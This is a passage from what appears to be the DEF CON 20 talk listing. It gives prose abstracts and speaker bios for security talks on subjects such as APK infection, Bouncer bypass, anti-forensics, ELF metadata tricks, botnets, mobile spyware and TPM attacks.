Second, we will show the audience findings from our UC “Federation” Honeypot research project. We've built a UC solution using a large commercial vendor, and have tested "Federation" with the help of the Global Federation Directory. Just to see what would happen. We've also set up a network of cloud based UC Federation honeypots using open source software, to explore attacks against UC Federation Systems.
Last, we show it can be done and how. Did you know that you can set up your own VoIP server with DNS based routing and HA and directly peer between VoIP servers, providing services for your friends and your company from your favorite BYOD using an address just like your email address, right now? For little to no cost, using open source software? It's interesting that when companies communicate VoIP inter-domain, the most prevalent architecture is to route calls over a private network, or through a carrier connected to the PSTN. Ironically, the infrastructure has existed for years to do direct public SIP peering. We'll explore this concept of "Islands of VoIP", and bring together our security research findings in this area along with industry roadblocks. Can a more open standard protocol be adopted using existing open source software, to easily UC "Federate" between different vendors? We think this is the future. It's exciting, and we want to show it to you.
Celebrating the 20th anniversary of DEF CON, this presentation is bold. We can't promise that it will be 100% complete, as it will likely evolve well past DEF CON. But we do promise some ballyhoo demos and shenanigans. Tomfoolery will ensue.
Jason Ostrom is a security researcher working in the VIPER Lab,
with an interest in UC application (In)security. He is a graduate of the University of Michigan, Ann Arbor,
and has over 14 years of experience in the IT industry, including VoIP penetration testing. He is the author
of the VoIP Hopper security tool and has contributed to other open source UC security tools.
Karl Feinauer is a Vulnerability Research Software Engineer working in
the VIPER Lab. Karl has a strong interest in Windows and UC security, and contributed to the development of the OCS
Assessment Tool. He is a graduate of the University of Texas at Arlington.
William Borskey is a Senior Security Consultant working in the VIPER Lab.
His areas of interest include telecommunications and security. He is a graduate of Louisiana State University at Baton Rouge.
APK File Infection on an
Android System
Bob Pan Mobile Security Research Engineer, TrendMicro Inc.
This concept of APK file infection on Android is similar to the concept of PE file infection on Windows systems. As the performance of Android device has increased, it's become possible to implement such a concept in Android systems. We will demonstrate how to implement this concept. In addition, we will also give a demo to show that a PoC virus can infect normal APK files in a real Android mobile phone.
Bob Pan mainly focuses on mobile platform security domain(including Android/iOS platforms).
He likes reverse-engineering and contributes to opensource. He is the owner of dex2jar (http://code.google.com/p/dex2jar/) which is one of most popular tools in the android security industry.
Now he works as a Mobile Security Research Engineer at TrendMicro.
Panel: The Making of DEF CON 20
Have you ever wondered what it takes to put DEF CON together, Well now is your chance to find out.
DEF CON is broken down into 10 departments: Security, Networking, Press, Speaker Ops, Contests, Vendors, Swag Booth,
Registration, Quarter Master, and Operations. Each of the department heads (aka the DEF CON Planning Staff) will be
part of this panel and will give an overview of what we do the other 361 days of the year to plan DEF CON. There
will also be time for Q&A from the audience so if you want to know how we do this, come prepared with questions.
Adventures in Bouncerland
Nicholas J. Percoco Senior Vice President,
Trustwave SpiderLabs
Sean Schulte Software Engineer, Trustwave
Sean Schulte Software Engineer, Trustwave
Meet [REDACTED]. He is a single function app that wanted to be much more.
He always looked up those elite malware and botnet apps but now that the
Google’s Bouncer moved into town his hopes and dreams appeared to be
shattered. This was until he was handed a text file while strolling along a
shady part of the Internet (AKA Pastebin). The title of this txt file was
“Bypassing Google’s Bouncer in 7 steps for Fun and Profit”. Upon reading
this, our little app began to glow with excitement. He routed himself all
the way to the gates of Google Play and began his journey from a simple
benign app that [REDACTED], to a full-fledged info stealing botnet
warrior. In this presentation we will tell the story of how our little app
beat the Bouncer and got the girl (well, at least all her personal
information, and a few naughty pics).
Nicholas J. Percoco: With more than 15 years of
information security experience, Percoco is the
lead security advisor to many of Trustwave¹s premier clients and assists
them in making strategic decisions around security compliance regimes. He
leads the SpiderLabs team that has performed more than 1300 computer
incident response and forensic investigations globally, run thousands of
penetration and application security tests for clients, and conducted
security research to improve Trustwave's products. Percoco and his
research has been featured by many news organizations including: The
Washington Post, eWeek, PC World, CNET, Wired, Hakin9, Network World, Dark
Reading, Fox News, USA Today, Forbes, Computerworld, CSO Magazine, CNN,
The Times of London, NPR, Gizmodo, Fast Company, Financial Times and The
Wall Street Journal.
Twitter: @c7five
http://blog.spiderlabs.com
Sean Schulte: Sean is an engineer at Trustwave who works primarily with Java and Ruby.
He is responsible for building external APIs such as the SSL reseller API,
and internal APIs including a Google Safe Browsing blacklist along with
the infrastructure to support various SSL services. In his spare time he
maintains an unpopular, but feisty, baseball blog.
Twitter: @sirsean
Anti-Forensics and Anti-Anti-Forensics: Attacks and Mitigating Techniques for Digital-Forensic Investigations
Michael Perklin
Digital investigations may be conducted differently by various labs (law enforcement agencies,
private firms, enterprise corporations) but each lab performs similar steps when acquiring, processing, analyzing,
or reporting on data. This talk will discuss techniques that criminals can use to throw wrenches into each of these
steps in order to disrupt an investigation, and how they can even force evidence to be excluded from litigation.
Each of these techniques can be detected early by an investigator who is aware of them, and they can be avoided
if you know what to look for. Come learn about Anti-Forensic techniques, and the Anti-Anti-Forensic techniques
that mitigate them.
Michael Perklin is a Senior Investigator and has performed digital-forensic
examinations on over a thousand devices. Michael is a member of the High Technology Crime Investigations Association,
a professor of digital forensics at Sheridan College, and is currently writing his thesis paper on anti-forensic techniques.
Twitter: @mperklin
Creating an A1 Security Kernel in the 1980s (Using “Stone Knives and Bear Skins”)
Tom Perrine Sr Enterprise Architect, Sr Manager IT Infrastructure
This is a retrospective of computer security research and the process of building
a secure operating system for the US government 1983-1990. The paper presents the case study of Kernelized
Secure Operating System (KSOS), an A1 security-kernel operating system. KSOS was written to protect
SCI/compartmented data (sometimes referred to as “above TOP SECRET”), and entered production.
KSOS-11 ran on PDP-11, and KSOS-32 ran on DEC VaX. KSOS-11 ran in less than 64K bytes and was a fully
functional OS including a security kernel, UNIX compatibility layer and first generation TCP/IP stack.
The design for KSOS was the first operating system design that was mathematically “proven correct”
using formal specifications and computer based theorem provers.
The presentation also discusses the computing technology of the day - 16 bit computers, line editors, primitive
(by current standards) compilers, theorem provers and how that affected development methods and what could be
accomplished.
This presentation is a technical retrospective of computer security research during 1983- 1990 placed in its
social and technical context. This presentation is being written especially for DEF CON’s 20th anniversary
and has never been published before. The last paper published specifically on KSOS was at the 7th NBS
Computer Security Conference in 1984.
Tom “tep” Perrine started on the ARPANET in
grade school, with accounts at MIT-MULTICS and other sites. After college graduation he shared an
IMP on the original ARPANET with the Navy and UCSD. During the 80s he worked on secure operating
systems such as KSOS for the intelligence community. In the 90s he was a security researcher
and CSO at the San Diego Supercomputer Center (SDSC), where he was also involved in “the
Kevin affair”. While at SDSC he also consulted for the FBI on Critical Infrastructure
Protection and was invited to give Congressional testimony on the FBI’s Carnivore program.
Since 2003 he has worked at a video game company, supporting game development studios and
operating hosting facilities for online video games. He is since moved on to developing
world wide IT strategies for the same company. He owns a complete set of the Rainbow Books
and the only copy of Takedown signed by both Tsutomu Shimomura and Kevin Mitnick.
Network Anti-Reconnaissance: Messing with Nmap Through Smoke and Mirrors
Dan "AltF4" Petro Security Researcher, DataSoft Corp
Reconnaissance on a network has been an attacker's game for far too long,
where's the defense? Nmap routinely evades firewalls, traverses NATs, bypasses signature
based NIDS, and gathers up the details of your highly vulnerable box serving Top Secret
documents. Why make it so easy?
In this talk, we will explore how to prevent network reconnaissance by using honeyd to
flood your network with low fidelity honeypots. We then discuss how this lets us
constrain the problem of detecting reconnaissance such that a machine learning algorithm
can be effectively applied. (No signatures!) We will also discuss some important additions
to honeyd that we had to make along the way, and perform a live demonstration of our
free software tool for doing all of the above: Nova.
Dan "AltF4" Petro: By day, Alt is a security researcher
for DataSoft Corp, a small business in Scottsdale Arizona, where he focuses on developing
open source tools for network security. He holds a M.S. in Information Assurance from Arizona
State University where he studied network security and cryptographic protocols. By night,
he is a rogue free software and privacy activist with a penchant for the dramatic. He is a
lifelong hacker and regular member of the Phoenix 2600.
Twitter: @2600AltF4
Bypassing Endpoint Security for $20 or Less
Phil Polstra
Computer Security Professor, University of Dubuque
In this talk cheap easily constructed devices which can be used to bypass
endpoint security software by making any USB mass storage (flash or hard) drive appear as
authorized devices will be presented.
The design and implementation will be discussed in detail. Devices can be
constructed for approximately $18 and $30 for a small package which requires
soldering of 4 wires, and a slightly larger package which requires no soldering,
respectively. Some familiarity with microcontrollers and C programming would be helpful,
but not required for attendees to get the most from this talk.
Phil Polstra was born at an early age. He cleaned out his
savings at age 8 in order to buy a TI99-4A computer for the sum of $450.
Two years later he learned 6502 assembly and has been hacking computers and
electronics ever since. Phil currently works as a professor at a private
Midwestern university. He teaches computer security and forensics.
His current research focus involves use of microcontrollers and small
embedded computers for forensics and pentesting.
Prior to entering academia, Phil held several high level
positions at well-known US companies. He holds a couple of the
usual certs one might expect for someone in his position.
Phil is also an accomplished aviator with several thousand hours
of flight time. He holds 12 ratings including instructor,
commerical pilot, mechanic, inspector, and avionics tech. When not
working, he likes to spend time with his family, fly,
hack electronics, and has been known to build airplanes.
Over the last few years Phil has spoken on various USB-related topics at a number
of conferences such as 44Con, NetSecure, MakerFaire Detroit, and Black Hat.
He has developed a number of cheap, fun, and useful devices for infosec and
forensics professionals.
Twitter: @ppolstra
Facebook: ppolstra
http://ppolstra.blogspot.com
The Safety Dance - Wardriving the Public Safety Band
Robert Portvliet Foundstone
Brad Antoniewicz Foundstone
Brad Antoniewicz Foundstone
The 4.9Ghz Public Safety Band has been deployed to a town near you! Police, Emergency Medical, and even Critical Infrastructure (power plants, etc.) maintain wireless networks on this seemingly ‘hidden’ band – but what’s actually there? How can you identify and monitor these networks? Stop by and find out the answers to those questions and more!
Robert Potvliet heads Foundstone’s wireless service line.
Brad Antoniewicz Brad Antoniewicz works in Foundstone's open
security research division to uncover flaws in popular technologies. He is a contributing author to both
the Hacking Exposed and Hacking Exposed: Wireless series of books and has authored various
internal/external Foundstone tools, whitepapers, and methodologies.
Twitter:@foundstone
http://blog.opensecurityresearch.com
Kevin Poulsen Answers Your Questions
Kevin Poulsen
Kevin Poulsen is the news editor of Wired.com and author of Kingpin:
How One Hacker Took Over the Billion-Dollar Cyber Crime Underground
(February 2011, Crown), the story of the white hat hacker Max Vision
and his turn to the dark side of the for-profit carding underground.
Poulsen is a former hacker, whose best known hack involved penetrating
telephone company computers in the early 1990s to win radio station
phone-in contests. By taking over all the phone lines leading to Los
Angeles radio stations, he was able to guarantee that he would be the
proper-numbered caller to win, for example, $20,000 in cash, and a
Porsche 944 S2 Cabriolet.
When the FBI started pursuing Poulsen, he went underground as a
fugitive. He was featured on NBC’s Unsolved Mysteries, and was finally
arrested in April 1991 after 18 months on the run. He pleaded guilty
to computer fraud and served a little over 5 years in prison. At the
time, it was the longest U.S. sentence ever given for hacking.
Following his release from prison Poulsen was briefly barred from
using computers. Reformed, but still possessed of the curiosity that
contributed to his hacking when he was younger, he became a
journalist. His first magazine feature ran in WIRED in 1998, and
covered computer programmers who were driven to survivalist tactics by
fear of the looming Y2K bug.
When Poulsen’s court supervision expired, he joined a California-based
web start-up called SecurityFocus as editorial director in 2000, and
began reporting security and hacking news. Poulsen repeatedly broke
stories of national importance that were picked up by the mainstream
press: a computer intrusion at a U.S. hospital that, for the first
time, breached patient medical records ; hackers “war driving” for
open Wi-Fi networks; a computer virus crippling a safety system at a
nuclear power plant in Ohio; a southern California hacker’s successful
penetration of a Secret Service agent’s PDA, and the attendant theft
of confidential agency files.
Poulsen left SecurityFocus in 2005 and joined Wired.com, where he now
serves as a news editor. In a computer-assisted reporting effort in
2006, Poulsen wrote software that scoured MySpace for registered sex
offenders, identifying hundreds. The story resulted in the arrest of
an active pedophile, led to significant policy changes at MySpace and
spawned federal legislation. In 2007, Poulsen’s reporting revealed
that the FBI had been using a custom spyware program, called a CIPAV,
to infect the computers of criminal suspects. In June 2010, Poulsen
and a co-writer broke the news that the government had secretly
arrested Army intelligence analyst Bradley Manning on suspicion of
leaking hundreds of thousands of classified documents to the
secret-spilling website WikiLeaks.
Poulsen is the founding editor of Wired’s Threat Level blog, which won
the 2008 Knight-Batten Award for Innovation in Journalism, and the
2010 MIN award for best blog. In 2009 Poulsen was inducted into MIN’s
Digital Hall of Fame for online journalism, and in 2010 he was among
those honored as a “Top Cyber Security Journalist” in a peer-voted
award by the SANS Institute. Poulsen's encyclopedic knowledge of "I
Love Lucy" trivia helped propel his team to victory in Hacker Jeopardy
at DEF CON 8.
Q&A with the Men (and Women) in Black
Priest Moderator
Back at DC9 a brave MIB from the CIA received clearance and volunteered to answer any and
all DC attendee's questions with no restrictions as honestly as he could. After that experience it's only
taken us 10 years to get several someone's to come back and do it again!
This will be your chance to meet and ask any question you want of the so called Men (and Women) in Black.
Representatives from the NRO, CIA, NSA, DIA, and US Military will field any and all questions you have on
any topic you want. However you may not like the answers.
We promise there will be no extreme renditions, water boarding, assassinations, or mind control
unless you really truly deserve it.
Hacker + Airplanes = No Good Can Come Of This
RenderMan Chief Researcher
What happens when a hacker gets bored and starts looking at an aircraft tracking systems? This talk will look
at ADS-B (Automatic Dependent Surveillance-Broadcast), a common technology installed or being installed on a vast majority of
commercial airliners that involves an unencrypted and unauthenticated radio broadcast. This technology has some interesting
features and weaknesses that are a useful lesson in failures when security is not built in from the beginning. This talk constitutes
a work in progress and hopes to spur more research and investigation into this field.
Brad Haines (RenderMan) CISSP, is a Whitehat by trade, Blackhat by fashion. A very
visible and well known member of the wardriving and hacker community, he does whatever he can to learn how things work, how
to make them better and to teach people the same. A firm believer in the hacker ethic of openness, sharing, and collaboration.
Never afraid to try something new, he can usually be found taking unnecessary risks for the sake of the experience.
Twitter: @ihackedwhat
MegaUpload: Guilty or Not Guilty?
Jim Rennie Attorney
Jennifer Granick Attorney
On January 19, 2012, Kim DotCom was arrested in a dramatic raid after being indicted on federal
criminal charges that he knew that his website, MegaUpload, was a haven of piracy and counterfeiting. In the days
that followed, the media commented on the presumed guilt of MegaUpload. In this debate, Jim argues that the law and
evidence clearly point to MegaUpload's officers being found guilty, while Jennifer will argue that the MegaUpload case
is built on unprecedented and wrongheaded interpretations of copyright law, and thus the principles should be found not
guilty. The debate will concentrate on the charges of conspiracy to commit copyright infringement and aiding &
abetting copyright infringement. After the arguments and rebuttals, the audience will vote and decide the fate of MegaUpload.
Jim Rennie is an attorney currently specializing in privacy and data protection
law and regulation. Previously he was a Public Defender in Las Vegas, and prior to law school was a web application
developer. He has spoken previously at DEF CON and other conferences on a variety of topics concerning law and technology.
Twitter: @falconred
Jennifer Granick specializes in computer crime law and has held such positions as
Civil Liberties Director at the Electronic Frontier Foundation and Executive Director of the Center for Internet and Society
at Stanford Law School. She is best known for her work with Intellectual Property law, free speech, privacy, and other things
relating to computer security, and has represented several high profile hackers.
Twitter: @granick
Stamp Out Hash Corruption! Crack All The Things!
Ryan Reynolds Manager, Security and Privacy at Crowe Horwath LLP
Jonathan Claudius Security Researcher, Spiderlabs Research, Trustwave
Jonathan Claudius Security Researcher, Spiderlabs Research, Trustwave
The precursor to cracking any password is getting the right hash. In this talk we are
going to cover how we discovered that Cain and Able, Creddump, Metasploit and other hash extraction tools
regularly yield corrupt hashes that cannot be cracked. We will take a deep dive into password extraction
mechanics, the birth of a viral logic flaw that started it all and how to prevent corrupt hashes. At the
conclusion of this talk we will release patches that prevent hash corruption in these tools that many security
professionals use every day.
Ryan Reynolds has been with Crowe for
five years and is the Manager responsible for Crowe's Penetration Testing services.
Ryan has a wide range of knowledge and experience in system administration and
networking to include security applications and controls. He is a technical lead
for engagements including application, network and infrastructure penetration testing
on both internal and external systems as well as social engineering & physical
security assessments.
Twitter: @reynoldsrb
Jonathan Claudius is a Security Researcher at Trustwave.
He is a member of Trustwave's SpiderLabs - the advanced security team focused on penetration testing,
incident response, and application security. He has ten years of experience in the IT industry with
the last eight years specializing in Security. At Trustwave, Jonathan works in the SpiderLabs
Research Division where he focuses on vulnerability research, network exploitation and is the
creator of the BNAT-Suite. Before joining SpiderLabs, Jonathan ran Trustwave's Global Security
Operations Center.
Twitter: @claudijd
Spy vs Spy: Spying on Mobile Device Spyware
Michael Robinson Consultant
Chris Taylor Security Researcher
Commercial spyware is available for mobile devices, including iPhones, Android Smartphones, BlackBerries, and Nokias. Many of the vendors claim that their software and its operation is undetectable on the smartphones after setup is complete. Is this true? Is there a way to identify whether or not some jerk installed spyware on your mobile phone or are you destined to be PWN'd?
This presentation examines the operation and trails left by five different commercial spyware products for mobile devices. Research for both Android and iPhone 4S will be given. A list of results from physical dumps, file system captures, and user files will be presented to show how stealthy the spyware really was. The results from the analysis of the install files will also be presented. From this information a list of indicators will be presented to determine whether or not spyware is on your phone.
Michael Robinson a/k/a Flash, conducts forensic examinations of computers and mobile devices for consulting firm in the Washington, DC area. In addition to his day job, he teaches graduate level courses in computer forensics and mobile device forensics at Stevenson University and George Mason University. Prior to his current consulting gig, Flash conducted computer forensic examinations in support of federal law enforcement. He worked for the Department of Defense for a bunch of years doing IT and forensics work. Flash has been in school forever. Eventually he'll get smart. He's building on his Master's in Computer Forensics with a Doctorate in the same field.
Chris Taylor is a security researcher and teacher that has been doing IT security, incident response, computer forensics, and mobile device forensics for the last 12 years. His experience comes from doing research, not reading research. Imagine that. He makes fun of his co-presenter constantly. He is also a staunch privacy advocate that hates writing bios.
Scylla: Because There's no Patch for Human Stupidity
Sergio 'flacman' Valderrama Consulting Manager, 2Secure
Carlos Alberto Rodriguez Co-Founder, 2Secure
When there's no technical vulnerability to exploit, you should try to hack what humans left for you,
and believe me, this always works.
Scylla provides all the power of what a real audit, intrusion, exclusion and analysis tool needs, giving the possibility of
scanning misconfiguration bugs dynamically.
Scylla aims to be a better tool for security auditors, extremely fast, designed based on real scenarios, developed by
experienced coders and constructed with actual IT work methods.
The words “Configuration Tracer” are the best definition for Scylla, a tool to help on IT audits.
Sergio 'flacman' Valderrama has been a coder and hacker since he
was in school (15 Years old?). Consulting Manager of 2Secure S.A.S, he has worked as security consultant for more than
6 years. Founder of ColombiaUnderground Team, he studied Computer Engineer at the Universidad de los Andes... (lot
of non interesting crap about titles and experience). And of course, he's the main developer of Scylla.
Carlos Alberto Rodriguez is Co-Founder at 2Secure, a Colombia-based company that provides specialized
security services for multiple sector companies. Senior Developer focused in security development with emphasis in
cryptographic algorithms, Senior Security Consultant, R&D Manager and Security Applications Leader for 2Secure
with over 7 years of experience in security and incident handling.
Twitter: @_S_aint_Iker
Bruce Schneier Answers Your Questions
Bruce Schneier
Bruce Schneier will answer questions topics ranging from the SHA-3 competition to the TSA to trust and society to squid.
Internationally renowned security technologist Bruce Schneier has
authored twelve books -- most recently Liars and Outliers -- and
hundreds of articles, essays, and academic papers. His influential
newsletter "Crypto-Gram," and his blog "Schneier on Security," are
read by over 250,000 people. Schneier is the Chief Security Technology
Officer of BT.
http://www.schneier.com
Programming Weird Machines with ELF Metadata
Rebecca "bx" Shapiro PhD student, Dartmouth College
Sergey Bratus Research Assistant Professor, Dartmouth College
Sergey Bratus Research Assistant Professor, Dartmouth College
The Executable and Linkable Format (ELF) is omnipresent; related OS and library
code is run whenever processes are set up and serviced (e.g., dynamically
linked). The loader is the stage manager for every executable. Hardly anyone
appreciates the work that the ELF backstage crew (including the linker and the
loader) puts in to make an executable run smoothly. While the rest of the world
focuses on the star, hackers such as the Grugq (in Cheating the ELF) and Skape
(in Locreate: An Anagram for Relocate), and the ERESI/ELFsh crew, know to
schmooze with the backstage crew. We can make a star out of the loader by
tricking it into performing any computation by presenting it with crafted but
otherwise well-formed ELF metadata. We will provide you with a new reason why
you should appreciate the power of the ELF linker/loader by demonstrating how
specially crafted ELF relocation and symbol table entries can act as
instructions to coerce the linker/loader into performing arbitrary
computation. We will present a proof-of-concept method of constructing ELF
metadata to implement the Turing-complete Brainfuck language primitives and well
as demonstrate a method of crafting relocation entries to insert a backdoor into
an executable.
Rebecca "bx" Shapiro is a graduate student at a small college in Northern
Appalachia. She enjoys tinkering with systems in undocumented manners to find hidden sources of computation. She
hopes to continue this work to find more specimens for Sergey Bratus's weird machine zoo.
Twitter: @bxsays
Sergey Bratus is a Northern Appalachian who hacks DWARF and ELF. It is his ambition
to collect and classify all kinds of weird machines; he is also a member of the http://langsec.org
conspiracy to eliminate large classes of bugs.
Twitter: @sergeybratus
We Have You by the Gadgets
Mickey Shkatov
Toby Kohlenberg Senior InfoSec Specialist, Fortune 500 company
Toby Kohlenberg Senior InfoSec Specialist, Fortune 500 company
Why send someone an executable when you can just send them a sidebar gadget?
We will be talking about the windows gadget platform and what the nastyness that can be done
with it, how are gadgets made, how are they distributed and more importantly their weaknesses.
Gadgets are comprised of JS, CSS and HTML and are application that the Windows
operating system has embedded by default. As a result there are a number of interesting
attack vectors that are interesting to explore and take advantage of.
We will be talking about our research into creating malicious gadgets, misappropriating
legitimate gadgets and the sorts of flaws we have found in published gadgets.
Mickey Shkatov AKA "Laplinker" , is a proud DC9723 member, not a Mossad agent, a breaker of code,
a researcher of vulnerabilities that will never see the light of day, a lunatic and a fun guy to drink with.
Twitter: @laplinker
http://www.laplinker.com
Toby Kohlenberg is an opinionated loud mouth who occasionally has interesting insights and useful
things to say about a wide variety of information security topics.
He's worked on a large number of different technologies in the information security space.
Past speaker at: T2, Shmoocon, Toorcon Seattle, PacSec and CanSecWest.
Can You Track Me Now? Government And Corporate Surveillance Of Mobile Geo-Location Data
Christopher Soghoian Open Society Fellow, Open Society Foundations
Ben Wizner Director, Speech, Privacy, & Technology Project, ACLU
Catherine Crump Staff Attorney, Speech, Privacy, & Technology Project, ACLU
Ashkan Soltani Independent Researcher & Consultant on privacy, security, and behavioral economics
Our mobile phones and apps systematically collect and store comprehensive historical lists of our locations and our travels.
Advertising and marketing companies extract and interpret these lists for use in their information-gathering networks, effectively
turning our phones into 24/7 location tracking devices. Because this information is readily available to the government, law
enforcement agencies now have unparalleled access to knowledge of where you are, where you've been, and through inference, who you are.
In this panel, tech experts Christopher Soghoian and Ashkan Soltani, alongside Catherine Crump, staff attorney with the ACLU's
Project on Speech, Privacy, and Technology, will present a briefing on the current technological and legal landscape of location
data tracking. The panelists will explore how consumer location tracking efforts weave a story about the systemic privacy
vulnerabilities of smart phones and the legal ways in which law enforcement has been able to hitch a ride. The panel will
be moderated by the Director of the ACLU's Project on Speech, Privacy, and Technology, Ben Wizner.
Christopher Soghoian is a Washington, D.C. based Open Society Fellow, a
Graduate Fellow at the Center for Applied Cybersecurity Research, and a Ph.D. Candidate in the School of Informatics
and Computing at Indiana University. Soghoian's research is focused on the topic of tech privacy, including both
consumer issues and government surveillance. He has used the Freedom of Information Act and other investigative
techniques to shed light on the scale of and methods by which the U.S. government spies on mobile cell phones and
this work has been cited by the Ninth Circuit Court of Appeals and featured on the Colbert Report.
Twitter: @csoghoian
http://www.dubfire.net/, http://paranoia.dubfire.net/
Ben Wizner is the Director of ACLU's Speech, Privacy & Technology
Project, which is dedicated to protecting and expanding the First Amendment freedoms of expression, association, and
inquiry; expanding the right to privacy and increasing the control that individuals have over their personal
information; and ensuring that civil liberties are enhanced rather than compromised by new advances in science and
technology. He has litigated numerous cases involving civil liberties abuses, including challenges to government
watchlists and Internet censorship. He has appeared regularly in the media, testified before Congress, and traveled
several times to Guantanamo Bay to monitor military commission proceedings. Ben is a graduate of Harvard College and
New York University School of Law.
Catherine Crump is a Staff Attorney with the ACLU's Speech, Privacy and
Technology Project. She specializes in free speech and privacy litigation, particularly regarding the impact of new
technologies on First and Fourth Amendment rights. Crump recently organized a nationwide public records investigation
that found local police departments regularly tracking citizens through their cell phones without warrants. The project
was featured in myriad news outlets, including The New York Times, The Washington Post, and MSNBC. She is also litigating
a series of cases challenging the government's claim that it can legally track the location of people's cell phones without
a warrant. Crump has been counsel of record for several ACLU amicus briefs in important cases involving technological
surveillance, including United States v. Jones, the Supreme Court case heard last term ruling that the GPS tracking of
vehicles constitutes a search. Crump is a non-residential fellow at the Stanford Center for Internet and Society, a 2004
graduate of Stanford Law School, and a 2000 graduate of Stanford University.
Twitter: @catherinencrump
Ashkan Soltani is an independent researcher and consultant focused on
privacy, security, and behavioral economics. He has more than 15 years of experience as a technology consultant
and has published three major reports on the extent and means of data tracking: "KnowPrivacy: The Current State of
Web Privacy, Data Collection, and Information Sharing," "Flash Cookies and Privacy," and "Flash Cookies and Privacy II."
His work highlights the prevalence and practice of tracking online, including the use of specific technologies designed
to circumvent consumer privacy choices online. He has served as a staff technologist in the Division of Privacy and
Identity Protection at the Federal Trade Commission and also worked as the primary technical consultant on the Wall
Street Journal's What They Know series, investigating Internet privacy and online tracking.
Twitter: @ashk4n
Botnets Die Hard - Owned and Operated
Aditya K. Sood
Security Practitioner - Isec Partners | PhD Candidate MSU
Richard J. Enbody Associate Professor,
Dep't of Computer Science and Engineering at Michigan State University
Richard J. Enbody Associate Professor, Dep't of Computer Science and Engineering at Michigan State University
Botnet designs are becoming more robust and sophisticated with the passage of time.
While the security world is grappling with the security threats posed by Zeus and SpyEye, a new breed of
botnets has begun to flourish. Present-day botnets such as smoke, ICE-X, NGR, etc use a mix of
pre-existing and newly developed exploitation tactics to disseminate infections. Botnets have been
successful in bypassing advanced defense mechanisms developed by the industry . This talk will
take you to the journey of the lives of present-day botnets. With a good set of demonstrations,
we will dissect the crux of upcoming breed of botnets.
Aditya K. Sood Aditya K Sood is a senior security practitioner and PhD
candidate at Michigan State University. At present he is working for iSECPartners. Prior to that, he has
already worked in the security domain for Armorize, COSEINC and KPMG. He is also a founder of SecNiche
Security Labs, an independent security research arena for cutting edge computer security research. At
SecNiche, he also acts as an independent security consultant for providing services including software
security and malware analysis. He has been an active speaker at industry conferences and already
spoken at RSA, Virus Bulletin, HackInTheBox, ToorCon, LayerOne, HackerHalted, SANS, Source,
EuSecWest, XCON, Troopers, OWASP AppSec USA, TRISC and others. He has published several papers
for IEEE Magazines, Virus Bulletin, CrossTalk, Usenix Login, Elsevier Journals, HITB Ezine,
Hakin9, ISSA and ISACA.
Twitter: @AdityaKSood
Blog
Secniche.com
Richard J. Enbody Ph.D., is associate professor in the
Department of Computer Science and Engineering at Michigan State University (USA) where he joined
the faculty in 1987. Enbody has served as acting and associate chair of the department and as
director of the computer engineering undergraduate program. His research interests include
computer security; computer architecture; web-based distance education; and parallel processing,
especially the application of parallel processing to computational science problems. Enbody has
two patents pending on hardware buffer-overflow protection that will prevent most computer
worms and viruses.
http://www.cse.msu.edu/~enbody
How to Channel Your Inner Henry Rollins
Jayson E. Street CIO, Stratagem 1 Solutions
Have you ever found yourself thinking “Boy I sure wish I could witness a guy rant for 20 minutes and barely come up for air” or maybe “I sure wish I could have seen firsthand an old time tent revival with a preacher screaming at me” Well then great news you are in luck. This is a talk on not just how we need to take a hard look at how we interact with people outside of our field. It also addresses how we can escape the echo chamber and hopefully burn it to the ground as we leave! All presented in a hopefully comical but most likely just ranty way!
Jayson E. Street is the author of the book 'Dissecting the Hack:
The F0rb1dd3n Network' plus creator of the site http://dissectingthehack.com
He's also spoken at DEF CON, BRUCON, UCON & at several
other CONs & colleges on a variety of Information Security subjects.
His life story can be found on Google under 'Jayson E.
Street'.
He's a highly carbonated speaker who has partaken of Pizza
from Beijing to Brazil. He does not expect anybody to still be reading this far
but if they are please note he was chosen as one of Time's persons of the year
for 2006.
Twitter: @jaysonstreet
Facebook: jayson.e.street
http://F0rb1dd3n.com
Can Twitter Really Help Expose Psychopath Killers' Traits?
Chris "TheSuggmeister" Sumner The Online Privacy Foundation
Randall Wald
Recent research has identified links between Psychopaths and the language they use (Hancock et al 2011),
with media reports suggesting that such knowledge could be applied to social networks in order help Law Enforcement Agencies
expose "Psychopath killers' traits". This is the first public study to research Psychopathy in the context of social media.
This study explored the extent to which it is possible to determine Psychopathy, and other personality traits based on Twitter
usage. This was performed by comparing self-assessment 'Dark Triad' (Psychopathy, Machiavellianism, Narcissism)
and 'Big Five' (Openness, Conscientiousness, Extraversion, Agreeableness, Neuroticism) personality traits with the
Twitter information, usage and language of 2927 participants.
Results show that there are a number of statistically significant correlations between an individual's darker personality
traits and their Twitter activity. We also identified links between users' attitudes to privacy, their personality traits
and their twitter use. We will present the improvement gains possible through the use of machine learning for personality
prediction and share the models and techniques employed.
In addition to presenting our results, this talk will provide an introduction into identifying psychopathic traits using
the Hare Psychopathy Checklist (PCL-R), present the technical approaches to collecting, storing and analyzing Twitter
data using Open Source technologies and discuss the current ethical, privacy and human rights concerns surrounding social
media analysis, vetting and labeling.
We will conclude with two proof of concept works, the first using the visualization tool Maltego to explore how visual
analysis could be used to identify potential troublemakers at events such a far right demonstrations; the second to
look at how personality traits influence response and interaction with a benign Twitter Bot.
The results highlight that in certain contexts, personality prediction through social media can perform with a
reasonably high degree of accuracy.
Chris is a contributor in the emerging discipline of Social Media Behavioral
Residue research where he combines his interests in Psychology, Social Networks, Data Mining and Visual Analytics.
He has previously spoken about these topics at BlackHat and DEF CON and is scheduled to speak at the European
Conference on Personality in July 2012 with a team of academic personality researchers.
Chris has been directly involved in Corporate Information Security at Hewlett-Packard since 1999 and is currently
focused on Security in the Development Lifecycle. Outside of work and together with a small group of likeminded
individuals, he co-founded the not-for-profit Online Privacy Foundation to conduct topical research and raise
security awareness at a community level.
Twitter: @TheSuggmeister
https://www.facebook.com/onlineprivacyfoundation
http://www.onlineprivacyfoundation.org/
Randall Wald is a researcher studying data mining and machine
learning at Florida Atlantic University. Following his BS in Biology from the
California Institute of Technology, Randall chose to shift his focus
to computer science, applying his domain knowledge towards
bioinformatics and building models to predict disease. He also studies
machine learning for other domains, including machine condition
monitoring, software engineering, and social networking.
http://www.ceecs.fau.edu/directory/randallwald
Attacking TPM Part 2: A Look at the ST19WP18 TPM Device
Chris Tarnovsky Flylogic, Inc.
The STMicroelectronics ST19WL18P TPM die-level analysis. Companies like Atmel,
Infineon and ST are pushing motherboard manufacturers to use these devices. End-users trust these devices
to hold passwords and other secrets. Once more, I will show you just how insecure these devices are.
Christopher 'Biggun' Tarnovsky owns Flylogic, Inc. and specializes in
analysis of semiconductors from a security "how strong is it really" standpoint. Flylogic offers detailed
reports on substrate attacks which define if a problem exists. If a problem is identified, we explain in a
